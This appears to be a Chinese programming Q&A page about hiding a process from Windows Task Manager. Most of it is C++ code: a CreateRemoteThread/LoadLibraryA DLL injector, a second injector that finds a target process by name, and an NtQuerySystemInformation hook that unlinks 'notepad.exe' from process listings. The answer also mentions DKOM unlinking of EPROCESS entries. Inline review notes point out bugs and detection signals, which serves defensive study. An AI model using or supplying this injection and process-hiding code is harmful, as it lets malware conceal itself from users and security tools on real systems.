
Windows 对任务管理器隐藏进程


我试图对taskmanager隐藏一个进程,但它不起作用。 我不明白为什么

提前谢谢你的帮助

这是我的函数,它注入了hider_dll.dll:

// Load the DLL at path `dll` into a process by writing the path into that
// process and starting a thread there on LoadLibraryA (the classic
// CreateRemoteThread injection chain). Returns 1 on success, 0 if
// OpenProcess or CreateRemoteThread fails.
//
// Review notes (defects are flagged, not fixed):
//  - The PID comes from getpid(), i.e. this process itself, so the
//    "remote" thread actually runs inside the injector.
//  - Neither hProc nor the thread handle h is ever passed to CloseHandle.
//  - From a defensive standpoint, the sequence
//    OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx ->
//    WriteProcessMemory -> CreateRemoteThread(LoadLibraryA) is the
//    canonical injection pattern that EDR/ETW telemetry and Sysmon
//    event ID 8 (CreateRemoteThread) surface.
int Inject(char* dll)
{
    int pid = getpid();   // own PID, see note above

    HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid);
    if(hProc)
    {
        cout<<"OpenProcess success"<<endl;
    }
    else
    {
        cout<<"OpenProcess failed..."<<endl;
        return 0;
    }
    // strlen(dll)+1 bytes are reserved, but the write below copies only
    // strlen(dll) bytes: the NUL terminator is never written, and the
    // remote LoadLibraryA relies on the freshly committed page reading as
    // zero. The return value (NULL on failure) is not checked.
    LPVOID Vmem=VirtualAllocEx(hProc,0,strlen(dll)+1,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
    // `wrt` is a 4-byte DWORD but is passed as SIZE_T*, an 8-byte object on
    // 64-bit Windows: WriteProcessMemory then stores past the end of `wrt`
    // (stack corruption, undefined behaviour). The BOOL result is ignored.
    DWORD wrt;
    WriteProcessMemory(hProc,Vmem,dll,strlen(dll),(SIZE_T*)&wrt);



    stringstream sstr;
    sstr << wrt;
    string str = sstr.str();

    cout<<"Writed "+str+" bytes"<<endl;

    // Wide literal, so this only builds with UNICODE defined (LoadLibraryW).
    // kernel32 is already mapped in every process; the address obtained here
    // is only meaningful in the target if kernel32 shares the same base there.
    FARPROC LoadLib=GetProcAddress(LoadLibrary(L"kernel32.dll"),"LoadLibraryA");
    HANDLE h=CreateRemoteThread(hProc,0,0,(LPTHREAD_START_ROUTINE)LoadLib,Vmem,0,0);
    if(h)
    {
        cout<<"CreateRemoteThread success"<<endl;
    }
    else
    {
        cout<<"CreateRemoteThread failed\r\nError:"<<GetLastError()<<endl;
        return 0;
    }
    WaitForSingleObject(h,INFINITE);
    // The thread's exit code is LoadLibraryA's HMODULE return value; on x64 it
    // is truncated to 32 bits by GetExitCodeThread. 0 indicates the load
    // failed in the target. Return values of the three calls are unchecked.
    DWORD exit;
    GetExitCodeThread(h,&exit);
    cout<<"Dll loaded to "<<exit<<endl;
    return 1;
    }
int Inject(char* dll)
{
int pid = getpid();
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if (hProc)
{

cout……

这是一个合适的注入器：

#include <iostream>
#include <Windows.h>
#include <TlHelp32.h>

// Return the PID of the first running process whose executable file name
// matches `procName` case-insensitively, or 0 if no such process exists
// (or the snapshot could not be taken).
//
// Review notes:
//  - CloseHandle(hSnap) is outside the validity check, so it is also called
//    with INVALID_HANDLE_VALUE when CreateToolhelp32Snapshot fails.
//  - szExeFile is a TCHAR array; comparing it against a const char* with
//    _stricmp only compiles when UNICODE is not defined.
//  - Matching is by image file name alone, which any process can choose,
//    so the result identifies a name, not a trusted identity.
DWORD GetProcId(const char* procName)
{
    DWORD procId = 0;
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hSnap != INVALID_HANDLE_VALUE)
    {
        PROCESSENTRY32 procEntry;
        procEntry.dwSize = sizeof(procEntry);   // required before Process32First

        if (Process32First(hSnap, &procEntry))
        {
            do
            {
                if (!_stricmp(procEntry.szExeFile, procName))
                {
                    procId = procEntry.th32ProcessID;
                    break;   // first match wins
                }
            } while (Process32Next(hSnap, &procEntry));
        }
    }
    CloseHandle(hSnap);   // also reached with an invalid handle, see note above
    return procId;
}

// Wait until a process named `procName` is running, then load `dllPath`
// into it with the same VirtualAllocEx / WriteProcessMemory /
// CreateRemoteThread(LoadLibraryA) chain reviewed above.
//
// Review notes:
//  - dllPath contains the literal text '%USERNAME%' (in quotes); nothing
//    here expands environment variables, so the string is a placeholder
//    rather than a usable path.
//  - The polling loop below never gives up: if the process does not
//    appear, main spins every 30 ms forever.
//  - VirtualAllocEx and WriteProcessMemory results are unchecked: `loc` may
//    be NULL, and the MAX_PATH allocation is never compared with
//    strlen(dllPath) + 1.
//  - Passing this process's LoadLibraryA address assumes kernel32 is mapped
//    at the same base in the target process.
//  - The thread handle is closed without waiting on it, so LoadLibrary's
//    outcome in the target is never observed.
//  - Detection: this call sequence is the textbook remote-thread injection
//    that Sysmon event ID 8 and EDR process-access telemetry report.
int main()
{
    const char* dllPath = "C:\\Users\\'%USERNAME%'\\Desktop\\dll.dll"; //
    const char* procName = "processname.exe"; //
    DWORD procId = 0;

    while (!procId)
    {
        procId = GetProcId(procName);
        Sleep(30);
    }

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, 0, procId);

    // OpenProcess returns NULL on failure; the INVALID_HANDLE_VALUE test is redundant.
    if (hProc && hProc != INVALID_HANDLE_VALUE)
    {
        void* loc = VirtualAllocEx(hProc, 0, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

        // Unlike the Inject() version, the terminating NUL is copied here.
        WriteProcessMemory(hProc, loc, dllPath, strlen(dllPath) + 1, 0);

        HANDLE hThread = CreateRemoteThread(hProc, 0, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, loc, 0, 0);

        if (hThread)
        {
            CloseHandle(hThread);   // closed immediately; no WaitForSingleObject
        }
    }

    if (hProc)
    {
        CloseHandle(hProc);
    }
    return 0;
}

首先，您没有复制 `dll` 所指向字符串末尾的终止符（NUL）。请尝试改用 `strlen(dll)+1`。PS：您还可以（从驱动程序中）通过操纵 EPROCESS 的 Flink 和 Blink 字段来进行 DKOM，不过 PatchGuard 会捕获它。
// Hooked function
//
// User-mode hook placed in front of NtQuerySystemInformation. It forwards
// the call to the original and, for SystemProcessInformation, unlinks every
// entry whose ImageName compares equal to "notepad.exe" by folding that
// entry's NextEntryOffset into the previous entry. The hidden entry's bytes
// remain in the caller's buffer; only the link is skipped.
// OriginalNtQuerySystemInformation and PMY_SYSTEM_PROCESS_INFORMATION are
// declared elsewhere (not shown on this page).
//
// Review notes (defects are flagged, not fixed):
//  - The first entry is never examined: pNext is advanced before the first
//    comparison, so only entries 1..N are tested.
//  - ImageName is a UNICODE_STRING whose Length is a byte count, yet it is
//    passed to wcsncmp as a character count, so the comparison can read up
//    to twice as far as intended. ImageName.Buffer can also be NULL (the
//    System Idle entry has an empty ImageName), which wcsncmp dereferences.
//  - Detection: because the entry is skipped rather than erased, the byte
//    count reported through ReturnLength still covers it, and a consumer
//    that walks the buffer linearly or diffs this view against another
//    enumeration path can see the gap. An inline hook on an ntdll export is
//    likewise visible to integrity checks that compare in-memory code with
//    the on-disk image.
NTSTATUS WINAPI HookedNtQuerySystemInformation(
    __in       SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout    PVOID                    SystemInformation,
    __in       ULONG                    SystemInformationLength,
    __out_opt  PULONG                   ReturnLength
)
{
    NTSTATUS status = OriginalNtQuerySystemInformation(SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength);
    // Only post-process a successful process-list query; every other class
    // and every error status is passed through untouched.
    if (SystemProcessInformation == SystemInformationClass && STATUS_SUCCESS == status)
    {
        // Loop through the list of processes
        PMY_SYSTEM_PROCESS_INFORMATION pCurrent = NULL;
        PMY_SYSTEM_PROCESS_INFORMATION pNext = (PMY_SYSTEM_PROCESS_INFORMATION)
            SystemInformation;

        do
        {
            pCurrent = pNext;
            // Entries are chained by byte offset; a NextEntryOffset of 0
            // marks the last entry (then pNext == pCurrent).
            pNext = (PMY_SYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent + pCurrent->
                NextEntryOffset);
            // Length is in bytes, wcsncmp expects characters; Buffer may be NULL.
            if (!wcsncmp(pNext->ImageName.Buffer, L"notepad.exe", pNext->ImageName.Length))
            {
                if (!pNext->NextEntryOffset)
                {
                    // pNext was the last entry: pCurrent becomes the tail.
                    pCurrent->NextEntryOffset = 0;
                }
                else
                {
                    // Bypass pNext by extending pCurrent's link past it.
                    pCurrent->NextEntryOffset += pNext->NextEntryOffset;
                }
                // Re-examine from pCurrent so consecutive matches are handled.
                pNext = pCurrent;
            }
        } while (pCurrent->NextEntryOffset != 0);
    }
    return status;
}